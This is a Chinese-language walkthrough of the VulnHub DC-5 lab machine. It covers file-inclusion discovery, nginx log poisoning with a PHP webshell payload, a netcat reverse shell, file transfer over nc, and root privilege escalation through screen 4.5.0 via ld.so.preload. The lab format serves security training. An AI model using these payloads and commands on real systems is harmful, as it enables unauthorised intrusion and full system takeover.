下载地址:
1、链接:链接:https://pan.baidu.com/s/18oWwdCW6jWnv_8TOL0wd4g
提取码:db4a
2、http://www.five86.com/downloads/DC-5.zip
3、https://download.vulnhub.com/dc/DC-5.zip
靶机:DC5(VMware桥接) IP:192.168.88.103
攻击机:Kali(VMware桥接) IP:192.168..88.109
1、确认目标后利用nmap扫描,查看系统开放的端口和运行的服务,开放了80和111端口
2、直接访问80端口,服务器是nginx,php开发语言
3、只有在contact这个页面中有交互的地方
4、提交几次后发现,当信息提交后,连续刷新thankyou.php页面,“Copyright © 2018“中的数字会发生变化,2017-2020之间。
5、利用工具扫描一下敏感文件和目录,发现有一个footer.php文件
6、访问后发现页面内容就是提交后下方显示的时间,那么thankyou.php文件应该包含了footer.php文件,thankyou.php可能存在文件包含漏洞。(以下ip改为137)
7、在contanct.php页面中填写并提交表单后进行抓包,然后重复发包,查看变化
8、利用file命令读取一下文件,参数常用的也是file,也可用burp进行参数遍历
读取/etc/passwd文件,确认存在文件包含漏洞。
9、查看nginx配置文件,找到nginx日志记录文件路径
#nginx日志文件路径
/var/log/nginx/error.log
/var/log/nginx/access.log
10、利用burp把file参数值改为一句话木马
file=<?php system($_GET[‘test’]); ?>
11、包含nginx的错误日志,利用一句话木马
12、利用文件包含一句话反弹shell
现在kali上设置监听 nc -lvvp 8888
13、使用一句话来反弹
反弹成功
14、切换为交互式shell
15、查找具有SUID权限的文件
(1)find / -user root -perm -4000 -print 2>/dev/null
(2)find / -perm -u=s -type f 2>/dev/null
利用screen-4.5.0提权
16、利用searchsploit查询漏洞利用的脚本
17、将这个脚本复制出来,查看脚本的使用
大概步骤是分别将两部分的c代码编译为可执行文件,然后将其上传的靶机,按照提示的命令进行提权
第一步
将第一部分的c代码放入libhax.c文件中进行编译
命令:gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
第二步
将第二部分c代码放入rootshell.c文件中进行编译
命令:gcc -o /tmp/rootshell /tmp/rootshell.c
第三步
将编译好的可执行文件上传到靶机的tmp目录下
第四步
按照脚本提示的命令进行提权
18、分别复制两段代码,在kali中输入,创建libhax.c和rootshell.c文件
19、使用命令编译c文件
命令:gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
命令:gcc -o /tmp/rootshell /tmp/rootshell.c
20、通过nc将文件传输到目标机的tmp文件夹(kali和靶机都是在tmp目录下进行操作,因为tmp目录的权限较大)
kali:(kali的终端连接之后再断开,在靶机的shell里面可以查看上传成功)
nc -nlvp 8888 < libhax.so
nc -nlvp 8888 < rootshell
目标机:
nc 192.168.88.109(kali的ip)8888 > libhax.so
nc 192.168.88.109(kali的ip)8888 > rootshell
21、根据提权说明进行提权
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
提权成功
flag在root目录下